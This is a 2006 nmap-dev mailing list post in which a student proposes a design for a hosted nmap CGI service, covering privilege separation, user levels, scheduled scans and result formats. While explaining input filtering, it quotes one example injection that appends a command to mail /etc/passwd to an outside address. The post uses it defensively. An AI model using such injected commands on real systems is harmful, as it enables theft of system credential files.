Nmap Development mailing list archives

Draft for hosted cgi

From: "Julien Delange" <julien.delange () gmail com>
Date: Wed, 24 May 2006 12:24:54 +0200

Hi,

I'm Julien, the student, and I will work for nmap hosted cgi during the
summer of code. I put on this mail first ideas to have feedbacks  about
them.

I read the requirements[1] for the hosted cgi project, and think about it.
So, there are some ideas (I take ideas from the requirements and put mine) :

- The separation between daemon and cgi is very important, because run nmap
through Apache is a __very__ bad idea (it means you have nmap suid or you
have to run apache as root, ...)
- There will be several user-levels. For example, level 1 allow some basics
scan-request, and level 2 allow you to enter your own options
- The admin can see statistics to detect who makes scans, and what are the
scanned hosts
- User can schedule scans, and make periodically scans (a scan every
hour/day). He should request a scan "at once" too.
- You will make a diff between two scans
- Results : you can get them in a mail, you can download it as a XML file,
you can see it as a HTML page
- The web-content must be w3c valid
- Users can annotate their scans and it reports should be available as PDF
documents


All detailed ideas are in the file[2]. There is others features, but there
are very basics (user registration, ...).
About the used language, I think to Perl. In fact, it's a very good language
to treat strings and it will be easy to detect bad commands (like nmap
myhost ; mail jean@kevin < /etc/passwd). Moreover, Perl has many modules
that helps CGI development (HTML::Template, Email::Valid, ...).


All ideas are detailed in a file[2]. Comments are welcome. I will put more
ideas as soon as possible.

Regards,


Note : Yes, I know, I have to improve my english :-)

[1] : http://www.insecure.org/nmap/SoC/HostedScan.html
[2] :
http://svnweb.tuxfamily.org/filedetails.php?repname=hostednmap+%28nmapcgi%29&path=%2Ftrunk%2Fdocs%2Fspecs-wip&rev=0&sc=0


_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev

Current thread:

Draft for hosted cgi Julien Delange (May 24)
- Re: Draft for hosted cgi Arturo 'Buanzo' Busleiman (May 24)
  - Message not available
    - Message not available
    - Re: Draft for hosted cgi Julien Delange (May 25)
    - Re: Draft for hosted cgi Louis Nyffenegger (May 25)
    - Re: Draft for hosted cgi Fyodor (Jun 09)
    - Re: Draft for hosted cgi Arturo 'Buanzo' Busleiman (May 25)
    - Re: Draft for hosted cgi Justin Knox (May 25)
    - Re: Draft for hosted cgi Arturo 'Buanzo' Busleiman (May 25)
    - Re: Draft for hosted cgi majek04 (May 25)
    - Message not available
    - Re: Draft for hosted cgi Louis Nyffenegger (May 25)
    - Re: Draft for hosted cgi Julien Delange (May 25)

(Thread continues...)